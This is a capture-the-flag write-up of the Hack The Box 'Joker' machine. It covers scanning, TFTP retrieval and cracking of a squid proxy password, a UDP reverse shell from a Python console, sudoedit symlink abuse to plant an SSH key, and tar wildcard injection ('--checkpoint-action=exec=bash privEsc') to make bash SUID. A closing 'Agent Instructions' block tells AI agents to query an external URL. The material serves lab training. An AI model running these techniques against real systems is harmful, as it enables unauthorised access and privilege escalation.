# Joker
## Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.21 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
{% code overflow="wrap" %}
```bash
# Nmap 7.92 scan initiated Thu Sep 15 18:41:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.21
Nmap scan report for 10.10.10.21
Host is up (0.045s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
# Nmap done at Thu Sep 15 18:42:12 2022 -- 1 IP address (1 host up) scanned in 26.59 seconds
```
{% endcode %}
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
> nmap -sC -sV -p22,3128 10.10.10.146 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.
{% code overflow="wrap" %}
```bash
# Nmap 7.92 scan initiated Thu Sep 15 18:42:32 2022 as: nmap -sCV -p22,3128 -oN targeted 10.10.10.21
Nmap scan report for 10.10.10.21
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
| 256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_ 256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Ifo: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 15 18:42:48 2022 -- 1 IP address (1 host up) scanned in 15.75 seconds
```
{% endcode %}
We only see port 22 (SSH), and port 3128 (Squid), which is a web proxy cache. In order to use it, we'll have to make a new proxy configuration in the *FoxyProxy* extension.
If we access the HTTP server through the web proxy, it will ask for credentials.
```
****** ERROR ******
***** Cache Access Denied. *****
===============================================================================
The following error was encountered while trying to retrieve the URL: http://
10.10.10.21:3128/
Cache Access Denied.
Sorry, you are not currently allowed to request http://10.10.10.21:3128/ from
this cache until you have authenticated yourself.
Please contact the cache_administrator if you have difficulties authenticating
yourself.
===============================================================================
Generated Fri, 16 Sep 2022 11:39:25 GMT by joker (squid/3.5.12)
```
As we don't have credentials, there is not much we can do with the web proxy. We need to find credentials. One thing that we have missed, is UDP ports. There is one particular service called TFTP which is exposed through the UDP 69 port. Nmap report the port as `filtered|open`.
> nmap -p69 -sU 10.10.10.21 -oN udpScan
* `-p` scan specific **port**.
* `-sU` **UDP** scan.
* `-oN` **save** the scan result into file, in this case the *udpScan* file.
```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-16 13:40 CEST
Nmap scan report for 10.10.10.21
Host is up (0.049s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
```
## Exploitation
If we connect to the TFTP server, and try to get the `/etc/passwd` file, we'll get an access violation error.
> tftp 10.10.10.21
```
tftp> get /etc/passwd
Error code 2: Access violation
```
But, one file that might be interesting to get is the squid configuration file `/etc/squid/squid.conf`, which is allow to download.
> tftp> get /etc/squid/squid.conf
```
Received 295428 bytes in 30.8 seconds
```
Inside the configuration file, there is a line where the authentication is being configured, and it shows the `/etc/squid/passwords` file.
> cat squid.conf | grep -v "#" | sed '/^$/d'
```
acl SSL_ports port 443
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny manager
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm kalamari
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
http_access deny all
http_port 3128
coredump_dir /var/spool/squid
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880
refresh_pattern . 0 20% 4320
```
Let's download that file.
> tftp> get /etc/squid/passwords
```
Received 48 bytes in 0.1 seconds
```
The file contains a password hash for the `kalamari` user.
> cat passwords
```
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0
```
Let's break the hash with *john*.
> john --wordlist=/usr/share/wordlists/rockyou.txt passwords
```
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateseafood (kalamari)
1g 0:00:03:50 DONE (2022-09-16 13:57) 0.004343g/s 31787p/s 31787c/s 31787C/s ihatesia..ihatepz
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Now that we have credentials, let's modify the proxy on *FoxyProxy*, and add the username and password.
As every request goes through the web proxy, we can access resources that we weren't available to access previously. For example, we could try to access the HTTP server. To do it, access `127.0.0.1:80` from the browser.
Before exploring the site, let's enumerate subdirectories with *gobuster*. Make sure to run the command through the proxy with the credentials.
> gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php --proxy
* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.
* `-x` file **extensions** to search for.
* `--proxy` specifies proxy.
```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] Proxy: http://kalamari:ihateseafood@10.10.10.21:3128
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2022/09/16 13:59:53 Starting gobuster in directory enumeration mode
===============================================================
/list (Status: 301) [Size: 251] [--> http://127.0.0.1/list/]
/console (Status: 200) [Size: 1479]
===============================================================
2022/09/16 14:09:11 Finished
===============================================================
```
The `/console` directory shows a python interactive console where I can run code.
We could try to get a reverse shell with *netcat*. First, set a *netcat* listener on port *4444*.
> nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
Now, import the `os` library, and send a reverse shell to our machine.
But, the netcat listener doesn't receive any connection. This might be happening because of some firewall configuration. Let's see what is inside the `/etc/iptables` directory. To see the output of the command, use `os.popen().read()`.
Let's get the content of the `rules.v4` file, but encoded in base64.
If we decode the content, we'll see that the firewall is blocking any *TCP* connection, except input connection to ports 22, and 3128. But *UDP* is accepted by the firewall, so we could send the reverse shell through *UDP*.
> echo 'IyBHZW\...wMTcK' | base64 -d
```
# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017
```
Set another *netcat* listener listening on the *UDP* port *4444*.
> nc -lvnp 4444 -u
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
* `-u` **UDP** mode.
Now send the reverse shell we sent before, but this time with the `-u` argument.
```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.21] 35333
/bin/sh: 0: can't access tty; job control turned off
$ whoami
werkzeug
```
## Privilege Escalation
First, let's set an interactive *TTY* shell.
> script /dev/null -c /bin/bash
Then I press `Ctrl+Z` and execute the following command on my local machine:
> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm
Next, I export a few variables:
> export TERM=xterm
>
> export SHELL=bash
Finally, I run the following command in our local machine:
> stty size
```
51 236
```
And set the proper dimensions in the victim machine:
> stty rows 51 columns 236
If we check the sudo privileges, we'll see that we can run as the `alekos` user the `sudoedit` command in the `/var/www/*/*/layout.html` file.
> sudo -l
```
Matching Defaults entries for werkzeug on joker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
sudoedit_follow, !sudoedit_checkdir
User werkzeug may run the following commands on joker:
(alekos) NOPASSWD: sudoedit /var/www/*/*/layout.html
```
Let's create the correct path. Inside the `/var/www/` directory there is another one called `testing`, which we are the owners, so we can create directories inside.
> ls -l /var/www/
```
total 12
-rwxr-x--- 1 root werkzeug 581 May 18 2017 manage-shorty.py
drwxr-x--- 5 root werkzeug 4096 May 18 2017 shorty
drwxr-xr-x 2 werkzeug werkzeug 4096 May 18 2017 testing
```
Let's create the `pwned` directory inside `testing`.
> mkdir /var/www/testing/pwned
Now, create the layout.html file inside.
> touch /var/www/testing/pwned/layout.html
Now, we can run the `sudoedit` command on that file as the `alekos` user. To get a shell, one thing we could do is make a symbolic link from `layout.html` to the `authorized_keys` file of `alekos`, and put inside our public SSH key so we are allowed to login as `alekos` to the system without the need of his password. First, create a symbolic link.
> n -s -f /home/alekos/.ssh/authorized\_keys layout.html
* `-s` make a **symbolic** link.
* `-f` **force**.
Now, on our local machine, create a pair of SSH keys.
> ssh-keygen
```
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:BB525izsjrcx4YURZ4Alw/RcnBBo+qu/GliJ9DGavw4 root@alfa8sa
The key's randomart image is:
+---[RSA 3072]----+
| o++X=*. |
| =O %o |
| . = B + |
|..=.o. = |
|.ooo + S |
| o. .+ o |
|.E....* |
| ..o. + |
| +*o.. |
+----[SHA256]-----+
```
Copy the public key.
> cat id\_rsa.pub | xclip -sel clip
Now, run the `sudoedit` command on the `layout.html` file as the `alekos` user, and paste you public key.
> sudoedit -u alekos /var/www/testing/pwned/layout.html
```
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHO61hOb4HBT0LprkG+SGm5x+EM+GQhrPPFfuNVTuDENIn3wJ38rx57GVTXssgjCpkU4A+BozL/xkj0oTbiMy3dvnOxkS6H70P7JGt/bdo8mzDpluNIwesZy4pclQuJ1Myx09Owx6SOgihMQlUUHArFdObnPjrCpTt+YlJOvSDU+32tWgJblwH4aBGw5cZAhq+v1zR0WUQ8TI7uSVpor3n+R+k/54qYYS6GTMKvc/kCjehlNDqpWuwwidvTK23cLcvhRDfW7ICOe7DjuRiGSAamfH6GD+jmnyeEZxpknpLL7k9Au4EUtkSlecOy3lJ5e4EvgJNka9/VIJ2bSzyyJx26r8XF9vCtSDa9ScOSmidWBV3POkV4Jx5ZjSGTSXrN9TZVHE/FFJyzoXdoZuXqsUxeiCY9doJBXS7JQLd5db1dmN80QenDQtZardBhyhWEkRIVFUQI3p/arunvK8SGzEsBbrV5dtKlPtrcsGfoAEO/hoLydOvQxdUKNdN8NLkQQU= root@alfa8sa
```
Now we should be able to log in via SSH as `alekos` without using a password. Then, we'll be able to grab the user flag.
> ssh alekos\@10.10.10.21
```
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Sep 16 15:41:59 2022 from 10.10.14.11
alekos@joker:~$ whoami
alekos
alekos@joker:~$ cat user.txt
583c85e1b7d552e8d75e61f1382dcc1f
```
Inside the home directory of the `alekos` user, there are two directories.
> ls -l
```
total 20
drwxrwx--- 2 root alekos 12288 Sep 16 15:40 backup
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
-r--r----- 1 root alekos 33 Sep 16 14:31 user.txt
```
The `development` directory has some files an folders of an application.
> ls -l development/
```
total 28
-rw-r----- 1 alekos alekos 1452 May 18 2017 application.py
drwxrwx--- 2 alekos alekos 4096 May 18 2017 data
-rw-r----- 1 alekos alekos 0 May 18 2017 __init__.py
-rw-r----- 1 alekos alekos 997 May 18 2017 models.py
drwxr-x--- 2 alekos alekos 4096 May 18 2017 static
drwxr-x--- 2 alekos alekos 4096 May 18 2017 templates
-rw-r----- 1 alekos alekos 2500 May 18 2017 utils.py
-rw-r----- 1 alekos alekos 1748 May 18 2017 views.py
```
And the `backup` directory has some backup files of the `development` directory. The backup files are made by the root user.
> ls -l backup/
```
total 680
-rw-r----- 1 root alekos 40960 Dec 24 2017 dev-1514134201.tar.gz
-rw-r----- 1 root alekos 40960 Dec 24 2017 dev-1514134501.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:35 dev-1663328101.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:40 dev-1663328401.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:45 dev-1663328701.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:50 dev-1663329001.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:55 dev-1663329301.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 15:00 dev-1663329602.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 15:05 dev-1663329901.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 15:10 dev-1663330201.tar.gz
```
If the root user is make all this backup files with the *tar* tool, and is using a wildcard character `*`, there is a way to [escalate privileges](https://gtfobins.github.io/gtfobins/tar/#shell) to root. I suppose that root might me running a command like this.
> tar -czvf dev-1514134201.tar.gz /home/alekos/development/\*
If this is the case, we can make the *root* user give the `/bin/bash` binary the *SUID* permission. First, make a file called `privEsc` on the `development` directory with the following content.
> nano /home/alekos/development/privEsc
```
chmod u+s /bin/bash
```
Now, we'll have to make a file called `--checkpoint=1` inside `development`.
> touch -- '/home/alekos/development/--checkpoint=1'
Create another file called `--checkpoint-action=exec=bash privEsc`.
> touch -- '/home/alekos/development/--checkpoint-action=exec=bash privEsc'
Now, if we wait for the *root* user to compress the `development` directory, those two files will act as arguments of the *tar* command, and it will run the `privEsc` script.
> ls -l /bin/bash
```
-rwsr-xr-x 1 root root 1041576 May 16 2017 /bin/bash
```
Now, all we have to do is run *bash* with *SUID* permissions, and reap the harvest and take the root flag.
> bash -p
```
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
7149317b70b4884de06ce96e0536641a
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/joker.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.